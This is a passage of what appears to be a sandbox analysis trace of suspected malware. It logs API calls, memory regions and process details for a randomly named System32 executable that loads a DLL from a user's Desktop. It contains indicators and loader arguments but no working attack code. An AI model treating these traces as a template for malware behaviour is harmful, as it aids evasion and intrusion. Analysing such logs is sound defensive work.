0x7774fa7c [0036.221] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0036.221] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0036.221] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0036.221] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0036.221] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0036.221] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0036.221] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0036.221] AddAtomS () returned 0x0 [0036.263] HeapDestroy (hHeap=0x740000) returned 1 Process: id = "67" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fb80" os_pid = "0xdb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomT /fn_args=\"%Temp%\\IXP000.TMP\\\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2916 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2917 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2918 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2919 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2920 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 2921 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2922 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2923 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2924 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 2925 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2926 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2927 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 2928 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2929 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 2930 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2931 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2932 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2933 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2934 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2935 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2936 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2937 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2938 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2939 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2940 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2941 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2942 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 2943 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2944 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2945 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2946 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2947 start_va = 0x400000 end_va = 0x500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2948 start_va = 0x510000 end_va = 0x110ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 2949 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2950 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 2951 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2952 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2953 start_va = 0x1200000 end_va = 0x13affff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 2954 start_va = 0x1240000 end_va = 0x133ffff entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 2955 start_va = 0x13a0000 end_va = 0x13affff entry_point = 0x0 region_type = private name = "private_0x00000000013a0000" filename = "" Region: id = 2956 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 2957 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2958 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2959 start_va = 0x13b0000 end_va = 0x14cffff entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Thread: id = 140 os_tid = 0xdb4 [0036.278] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef7d4 | out: lpSystemTimeAsFileTime=0x2ef7d4*(dwLowDateTime=0xe34ee550, dwHighDateTime=0x1d3dfba)) [0036.278] GetCurrentProcessId () returned 0xdb0 [0036.278] GetCurrentThreadId () returned 0xdb4 [0036.278] GetTickCount () returned 0x18304 [0036.278] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef7cc | out: lpPerformanceCount=0x2ef7cc*=377315778) returned 1 [0036.279] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.279] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0036.279] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0036.279] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0036.279] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0036.279] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.279] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.280] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.280] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.280] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.280] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.280] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.280] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.280] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.280] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.280] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.280] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.280] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.281] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.281] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.281] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.281] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.281] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.281] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.281] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.282] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.282] GetCurrentThreadId () returned 0xdb4 [0036.282] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomT /fn_args=\"%Temp%\\IXP000.TMP\\\"" [0036.282] GetEnvironmentStringsW () returned 0x87908* [0036.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0036.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x13a09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0036.282] FreeEnvironmentStringsW (penv=0x87908) returned 1 [0036.282] GetStartupInfoA (in: lpStartupInfo=0x2ef724 | out: lpStartupInfo=0x2ef724*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0036.282] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0036.282] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0036.282] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0036.282] SetHandleCount (uNumber=0x20) returned 0x20 [0036.282] GetLastError () returned 0x0 [0036.283] SetLastError (dwErrCode=0x0) [0036.283] GetLastError () returned 0x0 [0036.283] SetLastError (dwErrCode=0x0) [0036.283] GetLastError () returned 0x0 [0036.283] SetLastError (dwErrCode=0x0) [0036.283] GetACP () returned 0x4e4 [0036.283] GetLastError () returned 0x0 [0036.283] SetLastError (dwErrCode=0x0) [0036.283] IsValidCodePage (CodePage=0x4e4) returned 1 [0036.283] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2ef704 | out: lpCPInfo=0x2ef704) returned 1 [0036.283] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2ef1d0 | out: lpCPInfo=0x2ef1d0) returned 1 [0036.283] GetLastError () returned 0x0 [0036.283] SetLastError (dwErrCode=0x0) [0036.283] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x2ef160 | out: lpCharType=0x2ef160) returned 1 [0036.283] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef5e4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.283] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef5e4, cbMultiByte=256, lpWideCharStr=0x2eef48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0036.283] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x2ef1e4 | out: lpCharType=0x2ef1e4) returned 1 [0036.283] GetLastError () returned 0x0 [0036.283] SetLastError (dwErrCode=0x0) [0036.283] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0036.283] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef5e4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.283] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef5e4, cbMultiByte=256, lpWideCharStr=0x2eef18, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⮴矲狰Ā") returned 256 [0036.283] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⮴矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0036.283] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⮴矲狰Ā", cchSrc=256, lpDestStr=0x2eed08, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0036.283] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x2ef4e4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@\x86Úõ\x1c÷.", lpUsedDefaultChar=0x0) returned 256 [0036.283] GetLastError () returned 0x0 [0036.284] SetLastError (dwErrCode=0x0) [0036.284] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef5e4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.284] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef5e4, cbMultiByte=256, lpWideCharStr=0x2eef38, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⮴矲狰Ā") returned 256 [0036.284] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⮴矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0036.284] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⮴矲狰Ā", cchSrc=256, lpDestStr=0x2eed28, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ 